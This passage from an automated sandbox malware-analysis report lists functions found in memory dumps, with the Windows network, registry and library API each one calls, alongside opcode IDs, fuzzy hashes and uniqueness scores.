                                                                                              • Instruction Fuzzy Hash: F721AF71408380AFEB228F54DC84F66FFB8EF01310F0884AAE9849F152D365A409C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD1111, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ioctlsocket.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD118F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ioctlsocket
                                                                                              • String ID:
                                                                                              • API String ID: 3577187118-0
                                                                                              • Opcode ID: e3dafd106b1f813723c07eedeec64bf1870e80789c59b9bbd3366f183435d928
                                                                                              • Instruction ID: e6af20c6b42f49eba46d2edfaa094bc74c0a02d257d634bf7e08698851bfdcba
                                                                                              • Opcode Fuzzy Hash: e3dafd106b1f813723c07eedeec64bf1870e80789c59b9bbd3366f183435d928
                                                                                              • Instruction Fuzzy Hash: 7121A1714093846FEB22CF65DC84F96BFB8EF46310F0884EAEA889F152D364A518C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB132, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACB19C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationToken
                                                                                              • String ID:
                                                                                              • API String ID: 4114910276-0
                                                                                              • Opcode ID: bca86adf737e1afff647e3ef295187ced6be39780fdc0ea2d72c130ac78323c4
                                                                                              • Instruction ID: b0ff150440c1503e3d3aa7889b57d3f05fb8fce0c6970d58dd3a93b2bb27e901
                                                                                              • Opcode Fuzzy Hash: bca86adf737e1afff647e3ef295187ced6be39780fdc0ea2d72c130ac78323c4
                                                                                              • Instruction Fuzzy Hash: 0D11A2B1500244AFEB21CF65DC85FAABBACEF04320F18856AEA45DB141D775A504DB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACACDA, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACAD54
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 3644b5897f99a72571b60d02d98ab00d3afcd733eeee1c1a9e08738e7195681a
                                                                                              • Instruction ID: 933a9fcf4c5ef987f10c50544e2c8c441d2231acfe6f342d09212946b482a2d9
                                                                                              • Opcode Fuzzy Hash: 3644b5897f99a72571b60d02d98ab00d3afcd733eeee1c1a9e08738e7195681a
                                                                                              • Instruction Fuzzy Hash: 412190B5500208AFEB21CF55DC84FA6FBECEF14711F14846AE94A9B651D760E808CAB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD1212, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: accept
                                                                                              • String ID:
                                                                                              • API String ID: 3005279540-0
                                                                                              • Opcode ID: 57eb965488a4493fee2dc1044bbcbfb79efe5ca4082516f0e67f8c9193ade1a3
                                                                                              • Instruction ID: 1200019eb33e25a10ac145c716fec9406c9a5ae9680aa6a79bde26fdfdba62f4
                                                                                              • Opcode Fuzzy Hash: 57eb965488a4493fee2dc1044bbcbfb79efe5ca4082516f0e67f8c9193ade1a3
                                                                                              • Instruction Fuzzy Hash: D321C0B0500244AFEB21DF69DC84B66FBE8EF04320F1484AAED889B241E775B404CA71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD05DA, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 04BD0645
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileMappingOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1680863896-0
                                                                                              • Opcode ID: c8f0fd08794b503aa743681aa7278bdc3d78d2240458144ffa1eb4b3131726fc
                                                                                              • Instruction ID: b2fa49f3352a2fcdb82ad6af6aedab423663ecd0d5737e03c9f9db32009a52e6
                                                                                              • Opcode Fuzzy Hash: c8f0fd08794b503aa743681aa7278bdc3d78d2240458144ffa1eb4b3131726fc
                                                                                              • Instruction Fuzzy Hash: 5421C0B1500240AFEB21DF69DC85B66FBE8EF44324F0884AAED899B241E771F404CB75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB97E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 00ACB9EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Socket
                                                                                              • String ID:
                                                                                              • API String ID: 38366605-0
                                                                                              • Opcode ID: 1161fdc7931d190b080b6a33846b3fb590c94acbfac72e79b821d4e4148585c8
                                                                                              • Instruction ID: 13bd7ef6a7f80627b7f0b3a5d9178719f73e030f1baae224ebd181740d845718
                                                                                              • Opcode Fuzzy Hash: 1161fdc7931d190b080b6a33846b3fb590c94acbfac72e79b821d4e4148585c8
                                                                                              • Instruction Fuzzy Hash: D6219D71504640AFEB21DF69DC45F66FBE8EF04310F14886EEA859B292D776A408CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACBA43, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,?,?,?,?), ref: 00ACBAC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              • Opcode ID: 1b67362240cad4e7e49b660a449661c57301afeed9c8c73d5a52060fcedd79f5
                                                                                              • Instruction ID: e7a9d7eb46f5082dedab821b29d0ace10ceffc9763fb166b2c535c4159980a00
                                                                                              • Opcode Fuzzy Hash: 1b67362240cad4e7e49b660a449661c57301afeed9c8c73d5a52060fcedd79f5
                                                                                              • Instruction Fuzzy Hash: 4B216A314093C0AFDB128F65DC45AA2BFB4EF07320F0985DAE9C48F163D3659959DB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD06DA, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              • Opcode ID: 9529fff70bf6aa86b0419991e74564540245e70925c5499f1f7df242fdcfc996
                                                                                              • Instruction ID: 076d8bfcfa5a9538694cb2de0b6adbebc91d3adbcdd267ab7793077d166e3b43
                                                                                              • Opcode Fuzzy Hash: 9529fff70bf6aa86b0419991e74564540245e70925c5499f1f7df242fdcfc996
                                                                                              • Instruction Fuzzy Hash: 1821C071500204AFEB22DF59DC85F96FBE8EF08324F14849DEA899B241E771B508CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD51FA, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • K32GetModuleInformation.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD525E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationModule
                                                                                              • String ID:
                                                                                              • API String ID: 3425974696-0
                                                                                              • Opcode ID: 61fd8f8935d9ccd68b9bdd64c4e2e155842d9ae2cc7e4e94d938d61cec8e8142
                                                                                              • Instruction ID: f1e2f7895fa5272098190e1325cdad183946634b6e594d932cba0344c568e527
                                                                                              • Opcode Fuzzy Hash: 61fd8f8935d9ccd68b9bdd64c4e2e155842d9ae2cc7e4e94d938d61cec8e8142
                                                                                              • Instruction Fuzzy Hash: 3F1181B1600204AFEB20CF59DC85F6ABBA8EF44320F1484AAED45DB251E764E5089B71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD40F2, Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(?,00000E80), ref: 04BD417B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: a449bd19a98d276fde91b62254875b070614fdde8c64d16382cf1c71d0bb515a
                                                                                              • Instruction ID: 53d567ad15d7821f4fa4a3925dea7458bd0d63fe8475a98db6282d690907adf9
                                                                                              • Opcode Fuzzy Hash: a449bd19a98d276fde91b62254875b070614fdde8c64d16382cf1c71d0bb515a
                                                                                              • Instruction Fuzzy Hash: 0F11E1715043406FEB218B15DC85FA6BFB8EF45320F08849AFA849F192D264B948CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3942, Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenCurrentUser.KERNEL32(?,00000E80), ref: 04BD39A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenUser
                                                                                              • String ID:
                                                                                              • API String ID: 1571386571-0
                                                                                              • Opcode ID: 65df83c8d70a29d460c64a60a92db3a3a3d24356ce4569d4667e8be6f19a7729
                                                                                              • Instruction ID: db88cbb1f1d3b67bb55a5256aa943e5585cd7b6fe36c494a3b93ad5d870dded5
                                                                                              • Opcode Fuzzy Hash: 65df83c8d70a29d460c64a60a92db3a3a3d24356ce4569d4667e8be6f19a7729
                                                                                              • Instruction Fuzzy Hash: B211E6B1500204AEEB109F55DC85F6AFBE8EF04310F1488AAED459F146E674A5048AB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD5A1E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegSetValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD5A90
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              • Opcode ID: ee24a161afe2d2dbaa3fa6916fa42bed77f240765a430f32b8eb6c8626d598a6
                                                                                              • Instruction ID: 5a4ff166a4b6310950b3957d3f011c7ad353ba6bddec78bbfcf4f20f182aff7e
                                                                                              • Opcode Fuzzy Hash: ee24a161afe2d2dbaa3fa6916fa42bed77f240765a430f32b8eb6c8626d598a6
                                                                                              • Instruction Fuzzy Hash: 0A118EB6601604AFEB319E55DC81F66BBACEF04710F08849AED469B251E660F4099AB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3853, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RasConnectionNotificationW.RASAPI32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD38CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConnectionNotification
                                                                                              • String ID:
                                                                                              • API String ID: 1402429939-0
                                                                                              • Opcode ID: e0c0c7a336db5cb208d8cf009e207a8592e5340b4559b462b98ed33b4d1f5633
                                                                                              • Instruction ID: 613ad99a080dedbff63250b8dd5ad76c5a55282997dad0ec9b5789c5684b970b
                                                                                              • Opcode Fuzzy Hash: e0c0c7a336db5cb208d8cf009e207a8592e5340b4559b462b98ed33b4d1f5633
                                                                                              • Instruction Fuzzy Hash: 1411A2714093846FEB228F15DC85F66FFB8EF46310F08849AEE859B152D365A508C772
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD1B3D, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04BD1BB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadShim
                                                                                              • String ID:
                                                                                              • API String ID: 1475914169-0
                                                                                              • Opcode ID: b1f7d935d803ed296b2e5c769698fe0d94d042f801d26ea82e88d7105b4f03a9
                                                                                              • Instruction ID: 13c720376441ea2ccde7ff23b77e7410de11d7ccea88c8c71d5dfc888e4e4118
                                                                                              • Opcode Fuzzy Hash: b1f7d935d803ed296b2e5c769698fe0d94d042f801d26ea82e88d7105b4f03a9
                                                                                              • Instruction Fuzzy Hash: 482190B55093845FEB228F15DC44B62BFF8EF06310F0880CAED858B253E265E909C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD033E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD03B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 5ed2d92a6c6ca79c01f070ecec687b6ac9551b3c63cbc6078d4aa455bafa9780
                                                                                              • Instruction ID: 429070dc6f47208775ec217d3c47eb9a7a0fb8e7ec965a214cb7316840b164a2
                                                                                              • Opcode Fuzzy Hash: 5ed2d92a6c6ca79c01f070ecec687b6ac9551b3c63cbc6078d4aa455bafa9780
                                                                                              • Instruction Fuzzy Hash: 93118172500604AFEB20DF56DC84F67FBE8EF08724F04859AEA459B251E760F408DB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3B46, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegNotifyChangeKeyValue.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3BB0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeNotifyValue
                                                                                              • String ID:
                                                                                              • API String ID: 3933585183-0
                                                                                              • Opcode ID: 7c1a01cb237a7353e5c60d05f6d02ee0803c02aa4a6227a795294df2925554c8
                                                                                              • Instruction ID: 16714a3aff7a3a8a0d4e572ddae1f096be8e014ad3659f4f91189eadd9fc8d9e
                                                                                              • Opcode Fuzzy Hash: 7c1a01cb237a7353e5c60d05f6d02ee0803c02aa4a6227a795294df2925554c8
                                                                                              • Instruction Fuzzy Hash: F71181B1500204AEEB21CF55DC84FA6FBECEF44310F1494AAEE459B142E675A509DBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD0D26, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcessTimes.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0D85
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ProcessTimes
                                                                                              • String ID:
                                                                                              • API String ID: 1995159646-0
                                                                                              • Opcode ID: 6ee71e4850918f483aadadc198fd199ea1050c2a29e7589d03199779eb874a45
                                                                                              • Instruction ID: 95b343ccaa2dfcaf1ec3b0eb0553c777caa231750f7a65eeb6cae58753704618
                                                                                              • Opcode Fuzzy Hash: 6ee71e4850918f483aadadc198fd199ea1050c2a29e7589d03199779eb874a45
                                                                                              • Instruction Fuzzy Hash: 3311C871500304AFEB21DF55DC85FA6FBA8EF44310F1484AAEE469B151E774B404DB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3F67, Relevance: 1.6, APIs: 1, Instructions: 64networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04BD3FDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Connect
                                                                                              • String ID:
                                                                                              • API String ID: 3144859779-0
                                                                                              • Opcode ID: 74ee709855f649154b19197bf4ba7c7e9eb43d34433b146ed8f349062f6ba2d8
                                                                                              • Instruction ID: 1bae4a813837e839c90cbd7cf99f0c6c2db1f817899c42d788d7c28be0b7be80
                                                                                              • Opcode Fuzzy Hash: 74ee709855f649154b19197bf4ba7c7e9eb43d34433b146ed8f349062f6ba2d8
                                                                                              • Instruction Fuzzy Hash: 56216D71408384AFDB228F55DC44B62FFB8EF06210F0885DAED898B163E375A808DB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD691E, Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD697A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CertCertificateChainPolicyVerify
                                                                                              • String ID:
                                                                                              • API String ID: 3930008701-0
                                                                                              • Opcode ID: 63ec588dfb431fc6a9152a95296e633a323c14c7340c9f4ae4bb1a451c9da27b
                                                                                              • Instruction ID: ae374af3e8ae2b3b19ecdc97d025de11cd88a54b7c04a7c286281e0325329248
                                                                                              • Opcode Fuzzy Hash: 63ec588dfb431fc6a9152a95296e633a323c14c7340c9f4ae4bb1a451c9da27b
                                                                                              • Instruction Fuzzy Hash: BF11E7B1504204AFEB20DF69DC85F66FBA8EF44720F0484AAED459B245E774F408DB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD1316, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD137A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EventSelect
                                                                                              • String ID:
                                                                                              • API String ID: 31538577-0
                                                                                              • Opcode ID: 8cf86bed2489708421084aa62181ec80294bb2416e5d063a597c812733c5682d
                                                                                              • Instruction ID: 022c315a8025e9d11e759e270471ed59ef90cd7952e1114a5cbe481cd3618121
                                                                                              • Opcode Fuzzy Hash: 8cf86bed2489708421084aa62181ec80294bb2416e5d063a597c812733c5682d
                                                                                              • Instruction Fuzzy Hash: 871198B1500204AFEB11DF59DD84F96FBACEF44320F1485AAEE459B241E774B504DBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD5112, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • K32EnumProcessModules.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD516E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EnumModulesProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1082081703-0
                                                                                              • Opcode ID: e42995f6a6b203c31daa616e0e3ac9609b69c2ea081282b28b19e7693197bff9
                                                                                              • Instruction ID: 491dfe1ca2fe665615b3411d433fb3bdd0c8bfe5b2a5e74c940b5423521ea87f
                                                                                              • Opcode Fuzzy Hash: e42995f6a6b203c31daa616e0e3ac9609b69c2ea081282b28b19e7693197bff9
                                                                                              • Instruction Fuzzy Hash: F911C471900204BFEB21CF59DC85BA6FBA8EF44720F0484AAEE458B241E774A418DBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACA6B2, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 00ACA724
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: 7c9d2be9fc12ea73986d947f6d759ce3ce8eca5c690a2af59d4c2c8667594f40
                                                                                              • Instruction ID: d7fb0ad33f91d22fd4ded45efb8253452622b2b99804880e8bab84eafca744f9
                                                                                              • Opcode Fuzzy Hash: 7c9d2be9fc12ea73986d947f6d759ce3ce8eca5c690a2af59d4c2c8667594f40
                                                                                              • Instruction Fuzzy Hash: 9221477140D3C46FEB138B259C54A62BFB4EF17624F0980DBED858F2A3D2695908DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD1052, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • getsockname.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD10B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getsockname
                                                                                              • String ID:
                                                                                              • API String ID: 3358416759-0
                                                                                              • Opcode ID: 779ea95c3f949e07a28ed6fb60703758e95ea1044e72bc80ac1a25a94d18511e
                                                                                              • Instruction ID: a29ca0d70f55349b757e8533bd443da544abdd914774427de478b014342eecbd
                                                                                              • Opcode Fuzzy Hash: 779ea95c3f949e07a28ed6fb60703758e95ea1044e72bc80ac1a25a94d18511e
                                                                                              • Instruction Fuzzy Hash: F71186B1500244AFEB20DF69DC85F96BBA8EF44710F1484A6EE459B241E774A444CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACA607, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ACA672
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: defaa7e9214b661c12d3d6d4de01606956c6e969302a32781170e9f87623b6f8
                                                                                              • Instruction ID: b54de48ca3318f48dcaf64ceb0c3e58621d557a1a21d9be01e3bec044e1a8d95
                                                                                              • Opcode Fuzzy Hash: defaa7e9214b661c12d3d6d4de01606956c6e969302a32781170e9f87623b6f8
                                                                                              • Instruction Fuzzy Hash: C9117271409384AFDB228F55DC44B62FFB4EF5A310F08849AED858B152D375A819DB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD4ABE, Relevance: 1.6, APIs: 1, Instructions: 61registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegSetValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD4B28
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              • Opcode ID: b056889f1616ee6896718d1e79befe47d39afaaebccf406f23c04f9fb9219e04
                                                                                              • Instruction ID: b7e9e79d486c22619d672721abfd735cc73096476f88c6121b2853ccd457598d
                                                                                              • Opcode Fuzzy Hash: b056889f1616ee6896718d1e79befe47d39afaaebccf406f23c04f9fb9219e04
                                                                                              • Instruction Fuzzy Hash: D911C1B2500604AFEB218F55DC84F66FFA8EF44720F0484AAEE459B251E771F409DB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3002, Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePeek
                                                                                              • String ID:
                                                                                              • API String ID: 2222842502-0
                                                                                              • Opcode ID: 3841402a7cefd225d41d882a79c2d08f2ce28073e6cb3ccae41f83515a8a14a1
                                                                                              • Instruction ID: 0cf4889e6f7a45537294557539bf8cfcfdac31015ebd07f12c963a5b8488ac90
                                                                                              • Opcode Fuzzy Hash: 3841402a7cefd225d41d882a79c2d08f2ce28073e6cb3ccae41f83515a8a14a1
                                                                                              • Instruction Fuzzy Hash: 19119371409784AFDB228F25DC44B62FFB4EF46220F08C4DEED858B553D265A418DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD5458, Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 04BD54C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: fc3460bee3d29eab845ae9c39201d9ea9264b08a69fb22302c3f569156c78b1c
                                                                                              • Instruction ID: 04a30c8d62e7ad8605135642f972b99524383df7042e09c104f167891d72223c
                                                                                              • Opcode Fuzzy Hash: fc3460bee3d29eab845ae9c39201d9ea9264b08a69fb22302c3f569156c78b1c
                                                                                              • Instruction Fuzzy Hash: 0911A2754093C09FDB228F25DC44A52BFB4EF06220F0984DEED858F163D265A90CCB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD0102, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0161
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
